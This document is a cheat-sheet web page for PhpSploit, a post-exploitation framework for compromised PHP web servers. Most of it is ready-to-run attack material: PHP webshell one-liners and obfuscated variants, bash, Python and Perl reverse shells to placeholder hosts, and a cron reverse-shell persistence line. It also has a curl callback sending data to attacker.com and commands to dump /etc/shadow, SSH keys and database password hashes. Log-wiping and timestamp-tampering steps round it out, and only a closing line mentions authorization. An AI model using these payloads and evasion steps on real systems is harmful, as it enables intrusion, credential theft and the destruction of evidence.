コンテンツにスキップ
1337skills 1337skills - チートシート

PhpSploit

Overview

Section titled “Overview”

PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.

Key Features:

  • Stealth PHP backdoor deployment
  • Interactive remote shell environment
  • File upload, download, and manipulation
  • System enumeration and reconnaissance
  • Memory-based operation (minimal disk footprint)
  • Anti-detection capabilities
  • Multi-session management

Installation

Section titled “Installation”

From GitHub

Section titled “From GitHub”
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit

Requirements

Section titled “Requirements”
  • Python 3.6+
  • A web server with PHP execution capability
  • Target web server accessible

Verify Installation

Section titled “Verify Installation”
./phpsploit --version
./phpsploit --help

Docker

Section titled “Docker”
docker run -it --rm phpsploit

Basic Setup

Section titled “Basic Setup”

Start PhpSploit Console

Section titled “Start PhpSploit Console”
./phpsploit

Connect to Existing Backdoor

Section titled “Connect to Existing Backdoor”
phpsploit> connect http://target.com/shell.php

Deploy New Backdoor

Section titled “Deploy New Backdoor”
phpsploit> upload shell.php http://target.com/upload/

Interactive Shell

Section titled “Interactive Shell”
phpsploit> shell

Core Commands

Section titled “Core Commands”
CommandDescription
connectConnect to backdoor URL
uploadDeploy backdoor to server
downloadDownload file from server
shellInteractive command shell
runExecute system command
setConfigure framework settings
exploitRun exploitation modules
sessionsManage active sessions
helpDisplay command help
quitExit framework

Connection Management

Section titled “Connection Management”

Connect to Backdoor

Section titled “Connect to Backdoor”
phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.php

Connection with Proxy

Section titled “Connection with Proxy”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.php

Authentication

Section titled “Authentication”
phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.php

Session Management

Section titled “Session Management”
phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1  # Kill session

Remote Command Execution

Section titled “Remote Command Execution”

Execute Single Command

Section titled “Execute Single Command”
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a

Interactive Shell Mode

Section titled “Interactive Shell Mode”
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit

Execute Shell Scripts

Section titled “Execute Shell Scripts”
phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'

Background Command Execution

Section titled “Background Command Execution”
phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

File Operations

Section titled “File Operations”

Upload Files

Section titled “Upload Files”
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/

Download Files

Section titled “Download Files”
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dump

List Remote Directory

Section titled “List Remote Directory”
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*

Create/Modify Files

Section titled “Create/Modify Files”
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOF

System Enumeration

Section titled “System Enumeration”

Get System Information

Section titled “Get System Information”
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id

Network Information

Section titled “Network Information”
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn

Process Enumeration

Section titled “Process Enumeration”
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx

User and Privilege Information

Section titled “User and Privilege Information”
phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoers

Disk and Storage Information

Section titled “Disk and Storage Information”
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk

Backdoor Deployment

Section titled “Backdoor Deployment”

PHP Backdoor Creation

Section titled “PHP Backdoor Creation”
# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>

# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>

# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>

Deploy Backdoor via PhpSploit

Section titled “Deploy Backdoor via PhpSploit”
phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.php

Obfuscated Backdoor

Section titled “Obfuscated Backdoor”
# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>

# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>

Persistent Backdoor

Section titled “Persistent Backdoor”
# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php

Post-Exploitation Workflows

Section titled “Post-Exploitation Workflows”

Privilege Escalation Enumeration

Section titled “Privilege Escalation Enumeration”
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontab

Credential Harvesting

Section titled “Credential Harvesting”
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa

Lateral Movement

Section titled “Lateral Movement”
# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a

# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTEN

Data Exfiltration

Section titled “Data Exfiltration”
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/

# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64

# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64

Advanced Configuration

Section titled “Advanced Configuration”

Set User Agent

Section titled “Set User Agent”
phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"

Proxy Configuration

Section titled “Proxy Configuration”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050

Timeout Settings

Section titled “Timeout Settings”
phpsploit> set timeout 30
phpsploit> set connect_timeout 10

Request Headers

Section titled “Request Headers”
phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"

Verbosity and Logging

Section titled “Verbosity and Logging”
phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.log

Exploitation Techniques

Section titled “Exploitation Techniques”

Reverse Shell Deployment

Section titled “Reverse Shell Deployment”
# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &

# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"

Cron Job Persistence

Section titled “Cron Job Persistence”
phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -

SSH Key Injection

Section titled “SSH Key Injection”
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Database Access

Section titled “Database Access”
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Defense Evasion

Section titled “Defense Evasion”

Process Hiding

Section titled “Process Hiding”
# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/command

Timestamp Manipulation

Section titled “Timestamp Manipulation”
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php

Log Sanitization

Section titled “Log Sanitization”
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history

Firewall Bypass

Section titled “Firewall Bypass”
# DNS tunneling
phpsploit> run nslookup attacker.com

# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)

Scripting and Automation

Section titled “Scripting and Automation”

Create PhpSploit Script

Section titled “Create PhpSploit Script”
#!/bin/bash
# automated_exploitation.sh

TARGET="http://target.com/shell.php"

phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOF

Batch Command Execution

Section titled “Batch Command Execution”
phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'

Real-World Attack Scenarios

Section titled “Real-World Attack Scenarios”

Web Server Compromise

Section titled “Web Server Compromise”
# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/

# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php

# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id

# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.php

Database Extraction

Section titled “Database Extraction”
# Identify database
phpsploit> run find / -name "*.env" | grep -i database

# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE

# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql

Application Server Escalation

Section titled “Application Server Escalation”
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"

# Check for vulnerable services
phpsploit> run netstat -tulpn

# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null

Troubleshooting

Section titled “Troubleshooting”

Connection Issues

Section titled “Connection Issues”
# Verify backdoor accessibility
curl http://target.com/shell.php

# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.php

Command Execution Problems

Section titled “Command Execution Problems”
# Test basic commands
phpsploit> run echo test
phpsploit> run id

# Check PHP version
phpsploit> run php --version

File Transfer Issues

Section titled “File Transfer Issues”
# Verify file permissions
phpsploit> run ls -la /var/www/html/

# Check available space
phpsploit> run df -h /var/www/html/

Security Best Practices

Section titled “Security Best Practices”

Operational Security

Section titled “Operational Security”
  • Use VPN/proxy for all connections
  • Rotate backdoor locations regularly
  • Clean logs and evidence of activity
  • Use encrypted communication when possible
  • Establish dead drops for communication

Detection Avoidance

Section titled “Detection Avoidance”
  • Use legitimate PHP functions
  • Avoid suspicious filenames
  • Minimize footprint on disk
  • Use appropriate timing for activities
  • Monitor system for detection indicators

Version and Support

Section titled “Version and Support”
./phpsploit --version
Section titled “Legal and Ethical Considerations”

Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.